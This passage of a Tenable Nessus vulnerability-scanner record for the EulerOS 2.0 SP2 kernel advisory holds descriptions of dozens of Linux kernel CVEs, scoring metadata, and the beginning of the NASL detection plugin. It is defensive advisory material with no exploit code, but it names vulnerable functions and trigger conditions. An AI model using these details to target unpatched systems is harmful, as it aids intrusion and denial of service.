privileges\n needed. User interaction is not needed for\n exploitation.(CVE-2019-9458)An out-of-bounds memory\n write issue was found in the Linux Kernel, version 3.13\n through 5.4, in the way the Linux kernel's KVM\n hypervisor handled the 'KVM_GET_EMULATED_CPUID'\n ioctl(2) request to get CPUID features emulated by the\n KVM hypervisor. A user or process able to access the\n '/dev/kvm' device could use this flaw to crash the\n system, resulting in a denial of\n service.(CVE-2019-19332)kernel/sched/fair.c in the\n Linux kernel before 5.3.9, when cpu.cfs_quota_us is\n used (e.g., with Kubernetes), allows attackers to cause\n a denial of service against non-cpu-bound applications\n by generating a workload that triggers unwanted slice\n expiration, aka CID-de53fd7aedb1. (In other words,\n although this slice expiration would typically be seen\n with benign workloads, it is possible that an attacker\n could calculate how many stray requests are required to\n force an entire Kubernetes cluster into a\n low-performance state caused by slice expiration, and\n ensure that a DDoS attack sent that number of stray\n requests. An attack does not affect the stability of\n the kernel it only causes mismanagement of application\n execution.)(CVE-2019-19922)An exploitable\n denial-of-service vulnerability exists in the Linux\n kernel prior to mainline 5.3. An attacker could exploit\n this vulnerability by triggering AP to send IAPP\n location updates for stations before the required\n authentication process has completed. This could lead\n to different denial-of-service scenarios, either by\n causing CAM table attacks, or by leading to traffic\n flapping if faking already existing clients in other\n nearby APs of the same wireless infrastructure. An\n attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)A heap-based buffer\n overflow vulnerability was found in the Linux kernel,\n version kernel-2.6.32, in Marvell WiFi chip driver. A\n remote attacker could cause a denial of service (system\n crash) or, possibly execute arbitrary code, when the\n lbs_ibss_join_existing function is called after a STA\n connects to an AP.(CVE-2019-14896)A stack-based buffer\n overflow was found in the Linux kernel, version\n kernel-2.6.32, in Marvell WiFi chip driver. An attacker\n is able to cause a denial of service (system crash) or,\n possibly execute arbitrary code, when a STA works in\n IBSS mode (allows connecting stations together without\n the use of an AP) and connects to another\n STA.(CVE-2019-14897)In the Linux kernel through 5.4.6,\n there is a NULL pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel\n before 5.1.6, there is a use-after-free in cpia2_exit()\n in drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)In the Linux kernel\n before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel\n before 5.0.6, there is a NULL pointer dereference in\n drop_sysctl_table() in fs/proc/proc_sysctl.c, related\n to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)drivers/\n net/usb/pegasus.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8068)A heap-based buffer overflow\n was discovered in the Linux kernel, all versions 3.x.x\n and 4.x.x before 4.18.0, in Marvell WiFi chip driver.\n The flaw could occur when the station attempts a\n connection negotiation during the handling of the\n remote devices country settings. This could allow the\n remote device to cause a denial of service (system\n crash) or possibly execute arbitrary\n code.(CVE-2019-14895)The acpi_ds_create_operands()\n function in drivers/acpi/acpica/dsutils.c in the Linux\n kernel through 4.12.9 does not flush the operand cache\n and causes a kernel stack dump, which allows local\n users to obtain sensitive information from kernel\n memory and bypass the KASLR protection mechanism (in\n the kernel through 4.9) via a crafted ACPI\n table.(CVE-2017-13693)Linux kernel CIFS implementation,\n version 4.9.0 is vulnerable to a relative paths\n injection in directory entry lists.(CVE-2019-10220)A\n heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)In the AppleTalk subsystem in\n the Linux kernel before 5.1, there is a potential NULL\n pointer dereference because register_snap_client may\n return NULL. This will lead to denial of service in\n net/appletalk/aarp.c and net/appletalk/ddp.c, as\n demonstrated by unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/usb/class/cdc-acm.c driver, aka\n CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel\n before 5.3.9, there are multiple out-of-bounds write\n bugs that can be caused by a malicious USB device in\n the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c,\n drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c,\n drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c,\n drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c,\n drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free\n in binder.c allows an elevation of privilege from an\n application to the Linux Kernel. No user interaction is\n required to exploit this vulnerability, however\n exploitation does require either the installation of a\n malicious local application or a separate vulnerability\n in a network facing application.Product: AndroidAndroid\n ID: A-141720095(CVE-2019-2215)The do_remount function\n in fs/ namespace.c in the Linux kernel through 3.16.1\n does not maintain the MNT_LOCK_READONLY bit across a\n remount of a bind mount, which allows local users to\n bypass an intended read-only restriction and defeat\n certain sandbox protection mechanisms via a 'mount -o\n remount' command within a user\n namespace.(CVE-2014-5206)Multiple integer overflows in\n the lzo1x_decompress_safe function in\n lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor\n in the Linux kernel before 3.15.2 allow\n context-dependent attackers to cause a denial of\n service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux\n kernel is *not* affected media hype.'(CVE-2014-4608)The\n pivot_root implementation in fs/ namespace.c in the\n Linux kernel through 3.17 does not properly interact\n with certain locations of a chroot directory, which\n allows local users to cause a denial of service\n (mount-tree loop) via . (dot) values in both arguments\n to the pivot_root system call.(CVE-2014-7970)A security\n flaw was discovered in nl80211_set_rekey_data()\n function in the Linux kernel since v3.1-rc1 through\n v4.13. This function does not check whether the\n required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN\n privilege and may result in NULL dereference and a\n system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S\n in the Linux kernel through 3.15.1 on 32-bit x86\n platforms, when syscall auditing is enabled and the sep\n CPU feature flag is set, allows local users to cause a\n denial of service (OOPS and system crash) via an\n invalid syscall number, as demonstrated by number\n 1000.(CVE-2014-4508)fs/ namespace.c in the Linux kernel\n through 3.16.1 does not properly restrict clearing\n MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\n MNT_ATIME_MASK during a remount of a bind mount, which\n allows local users to gain privileges, interfere with\n backups and auditing on systems that had atime enabled,\n or cause a denial of service (excessive filesystem\n updating) on systems that had atime disabled via a\n 'mount -o remount' command within a user\n namespace.(CVE-2014-5207)In the Linux kernel before\n 5.3.7, there is a use-after-free bug that can be caused\n by a malicious USB device in the\n drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)In the Linux kernel\n before 5.3.12, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/input/ff-memless.c driver, aka\n CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel\n before 5.2.10, there is a use-after-free bug that can\n be caused by a malicious USB device in the\n drivers/hid/usbhid/hiddev.c driver, aka\n CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel\n before 5.3.7, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/iowarrior.c driver, aka\n CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel\n before 5.2.9, there is a use-after-free bug that can be\n caused by a malicious USB device in the\n drivers/usb/misc/yurex.c driver, aka\n CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel\n before 5.3.4, there is an info-leak bug that can be\n caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel\n before 5.3.11, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_core.c driver, aka\n CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel\n before 5.2.9, there is an info-leak bug that can be\n caused by a malicious USB device in the drivers/\n net/can/usb/peak_usb/pcan_usb_pro.c driver, aka\n CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel\n before 5.2.10, there is a race condition bug that can\n be caused by a malicious USB device in the USB\n character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A\n memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the\n mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in\n the mwifiex_pcie_init_evt_ring() function in drivers/\n net/wireless/marvell/mwifiex/pcie.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption) by triggering\n mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the\n adis_update_scan_mode() function in\n drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the\n crypto_report() function in crypto/crypto_user_base.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering crypto_report_alg() failures, aka\n CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in\n the rtl_usb_probe() function in drivers/\n net/wireless/realtek/rtlwifi/usb.c in the Linux kernel\n through 5.3.11 allow attackers to cause a denial of\n service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)A memory leak in the\n bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in\n drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)A memory leak in the\n ath9k_wmi_cmd() function in drivers/\n net/wireless/ath/ath9k/wmi.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)An issue was\n discovered in fs/xfs/xfs_icache.c in the Linux kernel\n through 4.17.3. There is a NULL pointer dereference and\n panic in lookup_slow() on a NULL inode->i_ops pointer\n when doing pathwalks on a corrupted xfs image. This\n occurs because of a lack of proper validation that\n cached inodes are free during\n allocation.(CVE-2018-13093)An issue was discovered in\n slc_bump in drivers/ net/can/slcan.c in the Linux\n kernel through 5.6.2. It allows attackers to read\n uninitialized can_frame data, potentially containing\n sensitive information from kernel stack memory, if the\n configuration lacks CONFIG_INIT_STACK_ALL, aka\n CID-b9258a2cece4.(CVE-2020-11494)An issue was\n discovered in the Linux kernel through 5.6.2.\n mpol_parse_str in mm/mempolicy.c has a stack-based\n out-of-bounds write because an empty nodelist is\n mishandled during mount option parsing, aka\n CID-aa9f7d5172fa. NOTE: Someone in the security\n community disagrees that this is a vulnerability\n because the issue 'is a bug in parsing mount options\n which can only be specified by a privileged user, so\n triggering the bug does not grant any powers not\n already held.'.(CVE-2020-11565)In the Linux kernel\n before 5.4.12, drivers/input/input.c has out-of-bounds\n writes via a crafted keycode table, as demonstrated by\n input_set_keycode, aka\n CID-cb222aed03d7.(CVE-2019-20636)An issue was\n discovered in the Linux kernel before 5.6.1.\n drivers/media/usb/gspca/ov519.c allows NULL pointer\n dereferences in ov511_mode_init_regs and\n ov518_mode_init_regs when there are zero endpoints, aka\n CID-998912346c0d.(CVE-2020-11608)An issue was\n discovered in the stv06xx subsystem in the Linux kernel\n before 5.6.1. drivers/media/usb/gspca/stv06xx/stv06xx.c\n and drivers/media/usb/gspca/stv06xx/stv06xx_pb0100.c\n mishandle invalid descriptors, as demonstrated by a\n NULL pointer dereference, aka\n CID-485b06aadb93.(CVE-2020-11609)In the Linux kernel\n before 5.6.1, drivers/media/usb/gspca/xirlink_cit.c\n (aka the Xirlink camera USB driver) mishandles invalid\n descriptors, aka CID-a246b4d54770.(CVE-2020-11668)A\n flaw was found in the Linux kernel's implementation of\n GRO. This flaw allows an attacker with local access to\n crash the\n system.(CVE-2020-10720)gadget_dev_desc_UDC_store in\n drivers/usb/gadget/configfs.c in the Linux kernel\n through 5.6.13 relies on kstrdup without considering\n the possibility of an internal '\\0' value, which allows\n attackers to trigger an out-of-bounds read, aka\n CID-15753588bcd4.(CVE-2020-13143)An issue was\n discovered in the Linux kernel through 5.6.11. sg_write\n lacks an sg_remove_request call in a certain failure\n case, aka CID-83c6f2390040.(CVE-2020-12770)A signal\n access-control issue was discovered in the Linux kernel\n before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in\n include/linux/sched.h is only 32 bits, an integer\n overflow can interfere with a do_notify_parent\n protection mechanism. A child process can send an\n arbitrary signal to a parent process in a different\n security domain. Exploitation limitations include the\n amount of elapsed time before an integer overflow\n occurs, and the lack of scenarios where signals to a\n parent process present a substantial operational\n threat.(CVE-2020-12826)The fix for CVE-2019-11599,\n affecting the Linux kernel before 5.0.10 was not\n complete. A local user could use this flaw to obtain\n sensitive information, cause a denial of service, or\n possibly have other unspecified impacts by triggering a\n race condition with mmget_not_zero or get_task_mm\n calls.(CVE-2019-14898)usb_sg_cancel in\n drivers/usb/core/message.c in the Linux kernel before\n 5.6.8 has a use-after-free because a transfer occurs\n without a reference, aka\n CID-056ad39ee925.(CVE-2020-12464)The __mptctl_ioctl\n function in drivers/message/fusion/mptctl.c in the\n Linux kernel before 5.4.14 allows local users to hold\n an incorrect lock during the ioctl operation and\n trigger a race condition, i.e., a 'double fetch'\n vulnerability, aka CID-28d76df18f0a. NOTE: the vendor\n states 'The security impact of this bug is not as bad\n as it could have been because these operations are all\n privileged and root already has enormous destructive\n power.'(CVE-2020-12652)An issue was found in Linux\n kernel before 5.5.4. The mwifiex_cmd_append_vsie_tlv()\n function in drivers/\n net/wireless/marvell/mwifiex/scan.c allows local users\n to gain privileges or cause a denial of service because\n of an incorrect memcpy and buffer overflow, aka\n CID-b70261a288ea.(CVE-2020-12653)An issue was found in\n Linux kernel before 5.5.4. mwifiex_ret_wmm_get_status()\n in drivers/ net/wireless/marvell/mwifiex/wmm.c allows a\n remote AP to trigger a heap-based buffer overflow\n because of an incorrect memcpy, aka\n CID-3a9b153c5591.(CVE-2020-12654)An issue was\n discovered in xfs_agf_verify in\n fs/xfs/libxfs/xfs_alloc.c in the Linux kernel through\n 5.6.10. Attackers may trigger a sync of excessive\n duration via an XFS v5 image with crafted metadata, aka\n CID-d0c7feaf8767.(CVE-2020-12655)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-17T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19527", "CVE-2020-11494", "CVE-2019-5108", "CVE-2019-19054", "CVE-2020-8992", "CVE-2020-8648", "CVE-2020-12770", "CVE-2020-9383", "CVE-2017-8068", "CVE-2019-19533", "CVE-2017-13080", "CVE-2019-19534", "CVE-2019-19057", "CVE-2014-3180", "CVE-2019-19332", "CVE-2019-14901", "CVE-2017-13693", "CVE-2020-12826", "CVE-2014-4508", "CVE-2019-19524", "CVE-2020-10942", "CVE-2019-14896", "CVE-2019-19062", "CVE-2018-13093", "CVE-2019-19922", "CVE-2020-11609", "CVE-2020-10720", "CVE-2019-20636", "CVE-2019-19523", "CVE-2019-19768", "CVE-2020-12464", "CVE-2014-5206", "CVE-2019-19965", "CVE-2020-12654", "CVE-2018-9389", "CVE-2019-19227", "CVE-2019-19319", "CVE-2019-19531", "CVE-2016-3951", "CVE-2019-10220", "CVE-2019-11599", "CVE-2019-19063", "CVE-2018-1000204", "CVE-2018-9383", "CVE-2019-14895", "CVE-2019-14897", "CVE-2019-19066", "CVE-2020-12653", "CVE-2019-19528", "CVE-2014-4608", "CVE-2020-11608", "CVE-2020-11668", "CVE-2016-9756", "CVE-2019-16230", "CVE-2020-13143", "CVE-2019-9458", "CVE-2017-12153", "CVE-2020-11565", "CVE-2020-8649", "CVE-2019-14898", "CVE-2020-12652", "CVE-2019-2215", "CVE-2019-19073", "CVE-2014-5207", "CVE-2020-8647", "CVE-2019-19530", "CVE-2019-19532", "CVE-2019-19074", "CVE-2019-18675", "CVE-2019-19537", "CVE-2020-2732", "CVE-2019-19966", "CVE-2019-19060", "CVE-2020-12655", "CVE-2019-19056", "CVE-2019-19536", "CVE-2019-20054", "CVE-2014-7970", "CVE-2019-20096"], "modified": "2020-06-17T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1674.NASL", "href": "https://www.tenable.com/plugins/nessus/137516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137516);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2014-3180\",\n \"CVE-2014-4508\",\n \"CVE-2014-4608\",\n \"CVE-2014-5206\",\n \"CVE-2014-5207\",\n \"CVE-2014-7970\",\n \"CVE-2016-3951\",\n \"CVE-2016-9756\",\n \"CVE-2017-12153\",\n \"CVE-2017-13080\",\n \"CVE-2017-13693\",\n \"CVE-2017-8068\",\n \"CVE-2018-1000204\",\n \"CVE-2018-13093\",\n \"CVE-2018-9383\",\n \"CVE-2018-9389\",\n \"CVE-2019-10220\",\n \"CVE-2019-14895\",\n \"CVE-2019-14896\",\n \"CVE-2019-14897\",\n \"CVE-2019-14898\",\n \"CVE-2019-14901\",\n \"CVE-2019-16230\",\n \"CVE-2019-18675\",\n \"CVE-2019-19054\",\n \"CVE-2019-19056\",\n \"CVE-2019-19057\",\n \"CVE-2019-19060\",\n \"CVE-2019-19062\",\n \"CVE-2019-19063\",\n \"CVE-2019-19066\",\n \"CVE-2019-19073\",\n \"CVE-2019-19074\",\n \"CVE-2019-19227\",\n \"CVE-2019-19319\",\n \"CVE-2019-19332\",\n \"CVE-2019-19523\",\n \"CVE-2019-19524\",\n \"CVE-2019-19527\",\n \"CVE-2019-19528\",\n \"CVE-2019-19530\",\n \"CVE-2019-19531\",\n \"CVE-2019-19532\",\n \"CVE-2019-19533\",\n \"CVE-2019-19534\",\n \"CVE-2019-19536\",\n \"CVE-2019-19537\",\n \"CVE-2019-19768\",\n \"CVE-2019-19922\",\n \"CVE-2019-19965\",\n \"CVE-2019-19966\",\n \"CVE-2019-20054\",\n \"CVE-2019-20096\",\n \"CVE-2019-20636\",\n \"CVE-2019-2215\",\n \"CVE-2019-5108\",\n \"CVE-2019-9458\",\n \"CVE-2020-10720\",\n \"CVE-2020-10942\",\n \"CVE-2020-11494\",\n \"CVE-2020-11565\",\n \"CVE-2020-11608\",\n \"CVE-2020-11609\",\n \"CVE-2020-11668\",\n \"CVE-2020-12464\",\n \"CVE-2020-12652\",\n \"CVE-2020-12653\",\n \"CVE-2020-12654\",\n \"CVE-2020-12655\",\n \"CVE-2020-12770\",\n \"CVE-2020-12826\",\n \"CVE-2020-13143\",\n \"CVE-2020-2732\",\n \"CVE-2020-8647\",\n \"CVE-2020-8648\",\n \"CVE-2020-8649\",\n \"CVE-2020-8992\",\n \"CVE-2020-9383\"\n );\n script_bugtraq_id(\n 68126,\n 68214,\n 69214,\n 69216,\n 70319\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2020-1674)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz),\n the core of any Linux operating system. The kernel\n handles the basic functions of the operating system:\n memory allocation, process allocation, device input and\n output, etc.Security Fix(es):In the Linux kernel before\n 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks\n validation of an sk_family field, which might allow\n attackers to trigger kernel stack corruption via\n crafted system calls.(CVE-2020-10942)In the Linux\n kernel 5.0.21, a setxattr operation, after a mount of a\n crafted ext4 image, can cause a slab-out-of-bounds\n write access because of an ext4_xattr_set_entry\n use-after-free in fs/ext4/xattr.c when a large old_size\n value is used in a memset call.(CVE-2019-19319)In\n kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)In the\n Linux kernel 5.4.0-rc2, there is a use-after-free\n (read) in the __blk_add_trace function in\n kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)There is a use-after-free\n vulnerability in the Linux kernel through 5.5.2 in the\n vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the vgacon_invert_region function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g\n pu/drm/radeon/radeon_display.c in the Linux kernel\n 5.2.14 does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)There is a\n use-after-free vulnerability in the Linux kernel\n through 5.5.2 in the n_tty_receive_buf_common function\n in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was\n discovered in the way that the KVM hypervisor handled\n instruction emulation for an L2 guest when nested\n virtualisation is enabled. Under some circumstances, an\n L2 guest may trick the L0 guest into accessing\n sensitive L1 resources that should be inaccessible to\n the L2 guest.(CVE-2020-2732)An issue was discovered in\n the Linux kernel through 5.5.6. set_fdc in\n drivers/block/floppy.c leads to a wait_til_ready\n out-of-bounds read because the FDC index is not checked\n for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i\n node in fs/ext4/block_validity.c in the Linux kernel\n through 5.5.3 allows attackers to cause a denial of\n service (soft lockup) via a crafted journal\n size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and\n WPA2) allows reinstallation of the Group Temporal Key\n (GTK) during the group key handshake, allowing an\n attacker within radio range to replay frames from\n access points to clients.(CVE-2017-13080)Linux Kernel\n version 3.18 to 4.16 incorrectly handles an SG_IO ioctl\n on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and\n an empty 6-byte cmdp. This may lead to copying up to\n 1000 kernel heap pages to the userspace. This has been\n fixed upstream in\n https://github.com/torvalds/linux/commit/a45b599ad808c3\n c982fdcdc12b0b8611c2f92824 already. The problem has\n limited scope, as users don't usually have permissions\n to access SCSI devices. On the other hand, e.g. the\n Nero user manual suggests doing `chmod o+r+w /dev/sg*`\n to make the devices accessible. NOTE: third parties\n dispute the relevance of this report, noting that the\n requirement for an attacker to have both the\n CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it\n 'virtually impossible to exploit.'(CVE-2018-1000204)The\n Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. This allows local users\n (with /dev/video0 access) to obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in\n the Linux kernel before 4.8.12 does not properly\n initialize Code Segment (CS) in certain error cases,\n which allows local users to obtain sensitive\n information from kernel stack memory via a crafted\n application.(CVE-2016-9756)Double free vulnerability in\n drivers/ net/usb/cdc_ncm.c in the Linux kernel before\n 4.5 allows physically proximate attackers to cause a\n denial of service (system crash) or possibly have\n unspecified other impact by inserting a USB device with\n an invalid USB descriptor.(CVE-2016-3951)Linux Kernel\n contains an out-of-bounds read flaw in the\n asn1_ber_decoder() function in lib/asn1_decoder.c that\n is triggered when decoding ASN.1 data. This may allow a\n remote attacker to disclose potentially sensitive\n memory contents.(CVE-2018-9383)Linux Kernel contains a\n flaw in the ip6_setup_cork() function in\n net/ipv6/ip6_output.c that is triggered when handling\n too small IPv6 MTU sizes. This may allow a local\n attacker to cause a crash or potentially gain elevated\n privileges.(CVE-2018-9389)In the Android kernel in the\n video driver there is a use after free due to a race\n condition. This could lead to local escalation of\n privilege with no additional execution privileges\n needed. User interaction is not needed for\n exploitation.(CVE-2019-9458)An out-of-bounds memory\n write issue was found in the Linux Kernel, version 3.13\n through 5.4, in the way the Linux kernel's KVM\n hypervisor handled the 'KVM_GET_EMULATED_CPUID'\n ioctl(2) request to get CPUID features emulated by the\n KVM hypervisor. A user or process able to access the\n '/dev/kvm' device could use this flaw to crash the\n system, resulting in a denial of\n service.(CVE-2019-19332)kernel/sched/fair.c in the\n Linux kernel before 5.3.9, when cpu.cfs_quota_us is\n used (e.g., with Kubernetes), allows attackers to cause\n a denial of service against non-cpu-bound applications\n by generating a workload that triggers unwanted slice\n expiration, aka CID-de53fd7aedb1. (In other words,\n although this slice expiration would typically be seen\n with benign workloads, it is possible that an attacker\n could calculate how many stray requests are required to\n force an entire Kubernetes cluster into a\n low-performance state caused by slice expiration, and\n ensure that a DDoS attack sent that number of stray\n requests. An attack does not affect the stability of\n the kernel it only causes mismanagement of application\n execution.)(CVE-2019-19922)An exploitable\n denial-of-service vulnerability exists in the Linux\n kernel prior to mainline 5.3. An attacker could exploit\n this vulnerability by triggering AP to send IAPP\n location updates for stations before the required\n authentication process has completed. This could lead\n to different denial-of-service scenarios, either by\n causing CAM table attacks, or by leading to traffic\n flapping if faking already existing clients in other\n nearby APs of the same wireless infrastructure. An\n attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)A heap-based buffer\n overflow vulnerability was found in the Linux kernel,\n version kernel-2.6.32, in Marvell WiFi chip driver. A\n remote attacker could cause a denial of service (system\n crash) or, possibly execute arbitrary code, when the\n lbs_ibss_join_existing function is called after a STA\n connects to an AP.(CVE-2019-14896)A stack-based buffer\n overflow was found in the Linux kernel, version\n kernel-2.6.32, in Marvell WiFi chip driver. An attacker\n is able to cause a denial of service (system crash) or,\n possibly execute arbitrary code, when a STA works in\n IBSS mode (allows connecting stations together without\n the use of an AP) and connects to another\n STA.(CVE-2019-14897)In the Linux kernel through 5.4.6,\n there is a NULL pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel\n before 5.1.6, there is a use-after-free in cpia2_exit()\n in drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)In the Linux kernel\n before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel\n before 5.0.6, there is a NULL pointer dereference in\n drop_sysctl_table() in fs/proc/proc_sysctl.c, related\n to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)drivers/\n net/usb/pegasus.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8068)A heap-based buffer overflow\n was discovered in the Linux kernel, all versions 3.x.x\n and 4.x.x before 4.18.0, in Marvell 